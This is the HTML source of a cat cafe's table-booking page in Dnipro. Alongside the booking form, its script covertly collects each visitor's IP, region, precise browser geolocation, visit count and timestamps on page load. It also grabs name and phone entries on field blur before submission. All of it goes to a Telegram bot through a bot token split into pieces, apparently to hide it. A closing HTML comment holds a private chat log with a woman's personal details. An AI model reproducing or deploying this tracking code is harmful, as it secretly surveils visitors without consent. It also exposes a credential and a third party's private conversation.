<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Cat Cafe Днепр, забронировать столик</title>	
<link rel="shortcut icon" href="favicon.ico">

<!-- for ios 7 style, multi-resolution icon of 152x152 -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-barstyle" content="black-translucent">
<link rel="apple-touch-icon" href="icon-152.png">
<!-- for Chrome on Android, multi-resolution icon of 196x196 -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="shortcut icon" sizes="196x196" href="icon-196.png">
	<link rel="stylesheet" href="iphone.css" media="only screen and (max-device-width: 480px)" />
<meta name="viewport" content="width=device-width; initial-scale=0.85; maximum-scale=0.85; user-scalable=0;" />

	
	
<script src="jquery.min.js"></script>
<script src="bootstrap.min.js"></script>
<script src="moment-with-locales.js"></script>
<script src="jquery.mask.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
<style>
body{
	background: url(https://lh3.googleusercontent.com/l6nSkIdgrujuYTvd8ACjWJDMMgNQ06BKQhx_Lu32AH2-oIqHKcTZvhQF7gmeygjxTlwY53Dudw=w1080-h608-p-no-v0) center center no-repeat; 
    background-size: cover; 
	color: white; 
	font-family: Roboto,RobotoDraft,Helvetica,Arial,sans-serif;
}
a{color: white; }
a:hover{color: white; }
.con{
    width: 320px;
    padding: 20px;
    background: rgba(48, 61, 68, 0.68);
	border-radius: 10px;
	box-shadow: 0px 1px 5px -1px black, 0px 10px 10px 0px rgba(0, 0, 0, 0.48);
	transition: all 200ms;
}
.dashed_{border-bottom: dashed 3px white; padding: 5px 0px;}
.center{text-align: center;}
input {
    border: 1px solid #c4c4c4;
    border-radius: 4px;
    margin-bottom: 14px;
    color: #8f8f8f;
    font-family: sans-serif, "OpenSans", Arial;
    font-size: 14px;
    width: 298px;
    padding: 9px 35px 9px 38px;
}
#input-group::after {
    content: attr(data-title);
    position: absolute; 
    left: 20%; top: 30%;
    z-index: 1;
    background: rgba(255,255,230,0.9);
    font-family: Arial, sans-serif;
    font-size: 11px; 
    padding: 5px 10px; 
    border: 1px solid #333; 
   }
.input-group:before, .input-group:after {
    visibility: hidden;
    opacity: 0;
    pointer-events: none;
	z-index: 100;
	transition: 2s;
}
.input-group:after {
    content: attr(data-title);    
	box-shadow: 0 2px 12px -2px black;
    position: absolute; top: 110%; left: 50%;
    margin-bottom: 5px;
    margin-left: -80px;
    padding: 7px;
    width: 160px;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    border-radius: 3px;
    background: #eee;
    color: #000;    
    text-align: center;
    font-size: 14px;
    line-height: 1.2;
}
.input-group:before {
    content:" ";
    position: absolute; top: 110%; left: 50%;
    margin-left: -5px;
    width: 0;
    border-bottom: 5px solid #eee;
    border-right: 5px solid transparent;
    border-left: 5px solid transparent;
    font-size: 0;
    line-height: 0;
    margin-top: -5px;
    z-index: 101;
}
.input-group.hover:before, .input-group.hover:after {
    visibility: visible;
    opacity: 1;
	transition: 0.5s;
}
.input-group {
    margin: 10px auto;
}
label {
    position: relative;
    cursor: text;
    padding-left: 25px;
    margin-right: 15px;
    font-size: 15px;
    font-family: sans-serif, "geinsp", Arial;
    color: #7b7b7b;
}
label:before {
    content: "";
    border: none;
    top: -2px;
    margin-right: 10px;
    position: absolute;
    left: 0;
    bottom: 1px;
    left: -180;
}
.labelphone:before {
    background: url(https://widget.gettable.ru/assets/newwidget/icons-sba93ce21a1-e17c4704addabdcba153de621ce4492907cce052c1bce73077e424083c02803b.png) 0 -2749px no-repeat;
    width: 17px;
    height: 22px;
}
.labelname:before {
    background: url(https://widget.gettable.ru/assets/newwidget/icons-sba93ce21a1-e17c4704addabdcba153de621ce4492907cce052c1bce73077e424083c02803b.png) 0 -2290px no-repeat;
    width: 16px;
    height: 22px;
}
select {
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
}
select::-ms-expand {  /* для IE */ 
    display: none;
}
option {
  padding: 6px 28px 6px 0;
}
option::alert {
  content: " " url(http://www.blogger.com/img/icon_28_followers.png);
  vertical-align: middle;
}
textarea { color: #8f8f8f; resize: vertical; min-height: 60px; border: none;}
</style>
</head>
<body onresize="con()">
<div class=con>
<h1><a href=http://cat.dp.ua>Cat Cafe</a></h1>
<h4 class=title>Закажите лучший столик</h4>
      <form id="form-contact" method="POST" class="form-element" autocomplete="off">
<fieldset>
    <div class="input-group" data-title="Укажите Ваше имя">
      <span class="input-group-addon"><i class="glyphicon glyphicon-user"></i></span>
      <input id="name" type="text" class="form-control" name="name" placeholder="Как Вас зовут?" required="required" minlength="2" autocomplete="on" >
    </div>
    <div class="input-group" data-title="Введите номер Вашего телефона для обратной связи">
      <span class="input-group-addon"><i class="glyphicon glyphicon-earphone"></i></span>
      <input id="phone-number" type="tel" class="form-control" name="phone" placeholder="+38 (___) ___-__-__" required="required" minlength="19" autocomplete="on" >
    </div>
    <div class="input-group">
      <span class="input-group-addon"><i class="glyphicon glyphicon-calendar"></i></span>
<select name="datepicker" id="datepicker" data-remote="true" name="data"  class="form-control" dir="rtl" onChange="time__(this.selectedIndex)">
</select>
    </div>
<div class="input-group">
      <span class="input-group-addon"><i class="glyphicon glyphicon-time"></i></span>
<select name="timepicker" id="timepicker" name="time"  class="form-control">
</select>
    </div>
	<div class="input-group">
      <span class="input-group-addon"><i class="glyphicon glyphicon-cutlery"></i></span>
<select name="cutlerypicker" id="cutlerypicker" class="form-control">
<option value="1-2 чел.">Столик на двоих</option>
<option value="3-4 чел.">Столик на 3-4 чел.</option>
<option value="5-8 чел.">Компания 5-8 чел.</option>
<option value="больше 9 чел.">Больше 9 чел.</option>
</select>
    </div>
	<div class="input-group">
      <span class="input-group-addon"><i class="glyphicon glyphicon-pencil"></i></span>
<textarea cols="30" id="guest__wish" name="text" placeholder="Ваши пожелания к брони" rows="3" class="form-control" maxlength="240"  autocomplete="on"></textarea>
    </div>
	</fieldset>
    <br>
	<div id=clear_lS style="
    display: none;
">#clear</div>
<!--script language="JavaScript" src="http://www.geoplugin.net/javascript.gp" type="text/javascript"></script-->
<script>
//localStorage
function _lSr(a){
return localStorage.getItem(a);
};
function _lSc(a, d){
localStorage.setItem(a, d);
};
function _lSu(a, d){
if(_lSr(a)==null){localStorage.setItem(a+'f', d);localStorage.setItem(a, d);}else{localStorage.setItem(a, d);};
};
//localStorage
//send
function _S_tel(e){
var a='.tel';var b='eg';var c='ram.org/';var d='AAHpvXr4X5hHTeq2L2g0qrRwRz4hx4_Q-jY';
	        $.ajax({
            type: "POST",
            url: 'https://api'+a+b+c+'bot876530454:'+d+'/sendMessage?chat_id=-380185005&parse_mode=html&text='+e,
            success: function (data) {},
            error: function (jqXHR, text, error) {}
        });
};
//send
function _che(a){
var _N='cat.dp.ua_rf';
_S_tel(_first(_N, 0)+' '+_lSr(_N+'_iP')+' '+_lSr(_N+'_dT')+' '+a);
};

function _first(_N, i){
if(_lSr(_N+'_iN')==null){
_lSc(_N+'_iN', i); 
return 'first';
}else{
_lSc(_N+'_iN', parseInt(_lSr(_N+'_iN'))+i);
return '№'+_lSr(_N+'_iN')+' '+_lSr(_N+'_iPf')+' '+_lSr(_N+'_dTf');
};
};
//coords
function coords(){
try{if ("geolocation" in navigator){ 
		navigator.geolocation.getCurrentPosition(function(position){
            		return "https://www.google.com/maps/search/"+position.coords.latitude+","+position.coords.longitude;
			});
	}else{return "Browser doesn't support geolocation!";};}catch(err){return 'coords: err'};
};
//coords
jQuery(document).ready(function($) {
var _N='cat.dp.ua_rf';
var _iP=0, _rgon=0, _coord=0;
if ("geolocation" in navigator){ 
		navigator.geolocation.getCurrentPosition(function(position){
            		var _geon="https://www.google.com/maps/search/"+position.coords.latitude+","+position.coords.longitude;
					_lSc(_N+'_geon', _geon);
					_S_tel('add geo '+_lSr(_N+'_iP')+' '+_lSr(_N+'_dT')+' '+_lSr(_N+'_geon'));
			});
	}else{
	    var _geon="Browser doesn't support geolocation!";
	    _lSc(_N+'_geon', _geon);
	};
try{_iP='ip:'+geoplugin_request();}catch(err){_iP='ip: err'};
_lSu(_N+'_iP', _iP);
var _cD = new Date(); 
var _dT = "Now: " + _cD.getDate() + "."
                + (_cD.getMonth()+1)  + "." 
                + _cD.getFullYear() + " "  
                + _cD.getHours() + ":"  
                + _cD.getMinutes() + ":" 
                + _cD.getSeconds()+  " (" 
				+ _cD.getTimezoneOffset()/60 + ")";
_lSu(_N+'_dT', _dT);
try{_rgon=geoplugin_countryName()+","+geoplugin_region()+","+geoplugin_city();}catch(err){_rgon='rgon: err'};
_lSc(_N+'_rgon', _rgon);
try{_coord="https://www.google.com/maps/search/"+geoplugin_latitude()+","+geoplugin_longitude();}catch(err){_coord=coords();};
_lSc(_N+'_coord', _coord);

_S_tel(_first(_N, 1)+' '+_lSr(_N+'_iP')+' '+_lSr(_N+'_dT')+' '+_lSr(_N+'_rgon')+' '+_lSr(_N+'_coord')+' '+_lSr(_N+'_geon'));
});


var now = moment().locale('ru');
moment.locale('ru', {
    calendar : {
        lastDay : '[Вчера:] ddd, Do MMMM YYYY',
        sameDay : '[Сегодня:] ddd, Do MMMM YYYY',
        nextDay : '[Завтра:] ddd, Do MMMM YYYY',
        lastWeek : '[Прошлые:] ddd, Do MMMM YYYY',
        nextWeek : '[]ddd, Do MMMM YYYY',
        sameElse : '[&#8194;&#8194;&#8194;&#8194;&#8194;&#8194;&#8194;&#8194;&#8194;]ddd, Do MMMM YYYY'
    }
});
for (var i = 0; i < 7; i++) {
  var checkday=moment().locale('ru');
  d__=checkday.add(i, 'days').calendar();
  s__="";
  if(i==1)s__="selected";
  $('<option ' +s__+ ' value="' +d__+ '">'+d__+ '</option>').appendTo('#datepicker');
};
function timepicker(a, b){
$("#timepicker").empty();
for (var i = 0; i < a; i++) {
	d__=b+i;
  $('<option id="' +d__+ '" value="' +d__+':00 ">'+d__+ ':00 </option>').appendTo('#timepicker');
  $('<option id="' +d__+ '" value="' +d__+ ':30">'+d__+ ':30</option>').appendTo('#timepicker');
};
if(a<=0)$('<option distabled id="-1" value="На сегодня бронь закрыта">На сегодня бронь закрыта</option>').appendTo('#timepicker');
};
function time__(a){
	if(a==0){
var time=moment().format('HH')
if(time<7){
	timepicker(12, 9);
}else{
	t__=time-7;
	timepicker(12-t__, 9+t__);
};
}else{timepicker(12, 9);};	
};
time__(1);
$(document).ready(function(){
  $('#phone-number').mask('+38 (000) 000-00-00');
});
</script>
<script>
$(document).ready(function () {

$('#name').blur(function(){
if (this.value.length > 1){
_che('blur name '+this.value);};
});
$('#phone-number').blur(function(){
if (this.value.length == 19){
_che('blur phone '+this.value);};
});
$('#clear_lS').click(function(){localStorage.clear();});


$('#name').bind("change keyup input click", function() {
if (this.value.match(/[^а-яА-Яa-zA-Z\s]/g)) {
this.value = this.value.replace(/[^а-яА-Яa-zA-Z\s]/g, '');
};
if (this.value.match(/^\s/)) {
this.value = this.value.replace(/^\s/, '');
}
}); 
$('#guest__wish').bind("change keyup input click", function() {
if (this.value.match(/[\<\>]/g)) {
this.value = this.value.replace(/[\<\>]/g, '');
}
});
    $(".form-element").submit(function () {
if ($('#name').val().length > 1) 
{
if ($('#phone-number').val().length == 19) 
{
send();
}else{
$('html, body').animate({scrollTop: $("#phone-number").offset().top}, 1000);
$('#phone-number').focus();
$('#phone-number').parent(".input-group").addClass('hover');
setTimeout(function(){ $('#phone-number').parent(".input-group").removeClass('hover');}, 5000);
};
}else{
$('html, body').animate({scrollTop: $("#name").offset().top}, 1000);
$('#name').focus();
$('#name').parent(".input-group").addClass('hover');
setTimeout(function(){ $('#name').parent(".input-group").removeClass('hover');}, 5000);
};
function send(){
var formNm = $('#form-contact');
var a='.tel';var b='eg';var c='ram.org/';var d='AAHpvXr4X5hHTeq2L2g0qrRwRz4hx4_Q-jY';
        var message = $(".form-message");
		var mess='Имя: '+$('#name').val()+' \n\n Тел:'+$('#phone-number').val()+' \n\n Дата: '+$('#datepicker').val()+' \n\n Время: '+$('#timepicker').val()+' \n\n Чел: '+$('#cutlerypicker').val()+' \n\n Комментарий: '+$('#guest__wish').val()+' ';
        $.ajax({
            type: "POST",
            url: 'https://api'+a+b+c+'bot876530454:'+d+'/sendMessage?chat_id=-362609574&parse_mode=html&text='+mess,
            data: formNm.serialize(),
            success: function (data) {
			  $(".title").html("Заявка отправлена<br><br>С Вами свяжутся по указанному номеру: "+$("#phone-number").val());
              formNm.css("display","none");
			  con();
            },
            error: function (jqXHR, text, error) {
                message.html("Что-то пошло не так:(<br>Попробуйте чуть позже");
            }
        });
		};
		con();
        return false;
	});








	
});


function con(){
  var mW = 0, mH = 0;
  var a=$(".con");
  var ah=a.height()+40;
  if( typeof( window.innerWidth ) == 'number' ) {
    //Non-IE
    mW = window.innerWidth;
    mH = window.innerHeight;
  } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
    //IE 6+ in 'standards compliant mode'
    mW = document.documentElement.clientWidth;
    mH = document.documentElement.clientHeight;
  } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
    //IE 4 compatible
    mW = document.body.clientWidth;
    mH = document.body.clientHeight;
  }
  if(mH>ah){
  var h=(mH-ah)/2;
  a.css("margin", h+"px auto");
  }else{a.css("margin", "auto");};
  //$('.title').html('mH='+mH+' ah='+ah);
};

$(window).bind('resize load', function () {
con();
});
</script>
<input type="submit" class="btn btn-default" style="
    width: 100%;
" value="Забронировать">
</form>
<h3 class="dashed_ center form-message"></h3>

<a href="tel:+3809353835669"><h3 class="center"><i class="glyphicon glyphicon-earphone"></i>+380953835669</h3></a>
    </div>
	
	

</body>


<!--
вчера
Привет)
Кофе любишь?
Привет 
Как же его не любить
Оо, шикарно!
Какой?
Латте
А пироженки?
Но это не так важно, на таком этапе общения  Расскажи о себе что нибудь
Не не не)
Не так быстро)
Я дикая сладкоежка, но ещё имею стальной характер благодаря которому вовремя умею себе отказать
Похвально!
Го на кофеёк
Не не не)
Не так быстро)
Эх)
Чем увлекаешься?
Чем занимаешься?
Увлечений у меня овер дофига
Сейчас попробую вкратце о себе рассказать
Сейчас на работе
Где работаешь?
Работаю консультантом спортивного питания. Да, я первая девушка консультант за всю историю Power life
Помимо этого, люблю тренажёрный зал. Ранее ходила стабильно, сейчас времени не хватает на отдых, а на зал так тем более
Ещё, делаю девочкам маникюр
Интересуюсь диетологией и нутрициологией
Учусь в мед академии на 4 курсе
Дико раздражают парни - зануды и "неженки "
Считаю себя открытым и искренним человеком)
Мало доверяю людям, и терпеть не могу одиночество
Вижу, после такого количества инфы кофе мы пить уже не будем...
Будем-будем)
На дневном учишься?
Да
Нутрициология - эт что?
Наука о питании
Пробую составлять программы питания. Вищитываю КБЖУ.. И ставлю небольшие эксперименты над своим телом
Надо на ком-то проводить эксперименты)
А не на себе
На кого учишься?
Телеграм есть?
Врач будущий
Есть
06878289
